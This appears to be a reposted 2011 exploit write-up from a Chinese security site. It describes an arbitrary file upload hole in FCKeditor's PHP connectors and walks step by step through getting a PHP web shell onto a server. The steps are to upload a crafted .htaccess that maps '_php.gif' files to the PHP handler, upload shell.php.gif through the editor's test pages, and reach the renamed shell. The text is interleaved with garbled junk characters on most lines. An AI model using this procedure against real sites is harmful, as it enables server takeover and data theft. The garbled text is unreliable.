FCKeditor所有php版本Upload上传漏洞
" h" e/ C5 q2 G' i$ b作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
Z) O4 C5 S. c0 ^& X, M" b减小字体 增大字体
: h) A' ] \! ]! r2 @ r: u5 W[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
% ~; }# K% n7 R# B[+] Date: 2011
$ \6 S" s7 I v# A. ~1 c6 X9 z4 t/ [[+] Author : sinesafe.cn- g0 r9 Z+ B3 c5 }3 ~( g
[+] Website : WwW.sinesafe.cn
+ q! [0 x& R3 ~0 E' |———————————————————
( |+ n# U4 A. Q) Q1.create a htaccess file:- a# P" O, j7 |# ^4 `4 N+ {
code:
. a5 e. Y; p9 A9 N+ o$ G6 A% i; C<FilesMatch “_php.gif”>( o+ }% Q; p2 ]
SetHandler application/x-httpd-php% i: V4 ?, Z/ |! k; m: q
</FilesMatch>( t2 ~9 b$ |) y1 S8 k
1 {! Y6 ]( Q" b# N5 f
2.Now upload this htaccess with FCKeditor.
) w* J. L+ g; p' O9 q$ @) z" ^" }% R8 g h- M" B
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
7 Q5 z( n9 m1 S# x* N) p; j# \% G" w1 M% ?
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html. I) M s# h( u5 ]9 n
. n R% ?" a, t# j5 B———————————————————————————————-
: N: c8 y/ c: }9 e3.Now upload shell.php.gif with FCKeditor.* u/ N+ [* x' r0 |4 }
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
9 H! T, y" A3 r5 c- O! Z5.http://www.sinesafe.cn/anything/shell_php.gif
& t+ d+ u8 g! X: T6.Now shell is available from server. |
, h0 K* `9 j3 q; B6 m* ?
6 Q) a; @$ `1 a) }. n' L" n. y: E2 f0 P' M
|